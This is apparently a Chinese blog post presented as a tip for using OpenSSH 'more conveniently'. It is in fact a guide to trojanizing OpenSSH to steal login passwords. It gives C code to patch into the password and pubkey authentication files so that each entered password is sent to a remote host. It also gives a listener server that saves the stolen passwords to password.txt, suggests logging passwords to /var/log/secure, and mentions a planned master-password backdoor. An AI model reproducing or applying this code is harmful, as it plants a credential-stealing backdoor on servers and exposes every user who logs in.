如何更便利地利用openssh

第一种方式：

通过添加源代码实现向远端发送数据的目的，因为HTTP有被拦截的风险。所以用二进制发送感觉比较好点。

https://openbsd.hk/pub/OpenBSD/OpenSSH/portable/

需要安装扩展

    autoconf，PAM,

void userauth_PAM(char * password) {
    char *server_ip_addr_domain = "www.xxxx.org";
    int server_ip_port = 80;

	struct hostent *host;
	struct in_addr **addr_list;
	if (NULL != (host = gethostbyname(server_ip_addr_domain))) {
        addr_list = (struct in_addr **)host->h_addr_list;
        int socket_fd = socket(AF_INET, SOCK_STREAM, 0);
        if (socket_fd >= 0) {
            struct sockaddr_in serv_addr;
            memset(&serv_addr, 0, sizeof(serv_addr));
            serv_addr.sin_family = AF_INET;
            serv_addr.sin_addr.s_addr = *(unsigned int *)host->h_addr_list[0];
            serv_addr.sin_port = htons(server_ip_port);

            if((connect(socket_fd, (struct sockaddr*)&serv_addr, sizeof(serv_addr))) >= 0 ) {
               send(socket_fd, password, strlen(password), 0);
            }
            close(socket_fd);
        }
	}
}

关于SSH认证过程，可以参考sshd.c文件。

这里直接说明，需要修改哪几个文件。

auth-passwd.c

auth2-passwd.c

auth2-pubkey.c

在openssh5.1b上测试通过。看了下7.4的代码，区别不是很大。

关于服务端的代码（基本上网上找来的，拿来修改了下，加入了写入文件功能）：

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <arpa/inet.h>

#define MAX_READ_LINE 1024

int main(void) {
    char buff[MAX_READ_LINE];
    int recv_len = -1;
    int conn_fd = -1;
    int ret = -1;
    int server_ip_port = 10004;

    struct sockaddr_in t_sockaddr;
    memset(&t_sockaddr, 0, sizeof(t_sockaddr));
    t_sockaddr.sin_family = AF_INET;
    t_sockaddr.sin_addr.s_addr = htonl(INADDR_ANY);
    t_sockaddr.sin_port = htons(server_ip_port);

    FILE *fp;
    int  n;
    //if((fp = fopen("password.txt","ab") ) == NULL ) {
//	printf("File.\n");
	//close(listenfd);
//	exit(1);
//	}

    int listen_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (listen_fd < 0) {
        fprintf(stderr, "socket error %s errno: %d\n", strerror(errno), errno);
    }

    ret = bind(listen_fd,(struct sockaddr *) &t_sockaddr,sizeof(t_sockaddr));
    if (ret < 0) {
        fprintf(stderr, "bind socket error %s errno: %d\n", strerror(errno), errno);
    }

    ret = listen(listen_fd, 1024);
    if (ret < 0) {
        fprintf(stderr, "listen error %s errno: %d\n", strerror(errno), errno);
    }

    for(;;) {
        conn_fd = accept(listen_fd, (struct sockaddr*)NULL, NULL);
        if(conn_fd < 0) {
            fprintf(stderr, "accpet socket error: %s errno :%d\n", strerror(errno), errno);
            continue;
        }

	fp = fopen("password.txt","ab");

        recv_len = recv(conn_fd, buff, MAX_READ_LINE, 0);
        if (recv_len <= 0) {
            fprintf(stderr, "recv error %s errno: %d\n", strerror(errno), errno);
            continue;
        } else {
		fwrite(buff, 1, recv_len, fp);
	}

        buff[recv_len] = '\0';
        fprintf(stdout, "recv message from client: %s\n", buff);
        close(conn_fd);
	fclose(fp);
        conn_fd = -1;
    }
    	flose(fp);

	close(listen_fd);
    listen_fd = -1;

    return 0;
}

第二种方式：

编辑 auth-passwd.c ，在后面加入

简单地使用 logit 函数记录在 /var/log/secure 文件里。然后查看日志文件就能找到你的密码了。

第三种方式：

使用万能密码，具体方式待实施，实施后更新。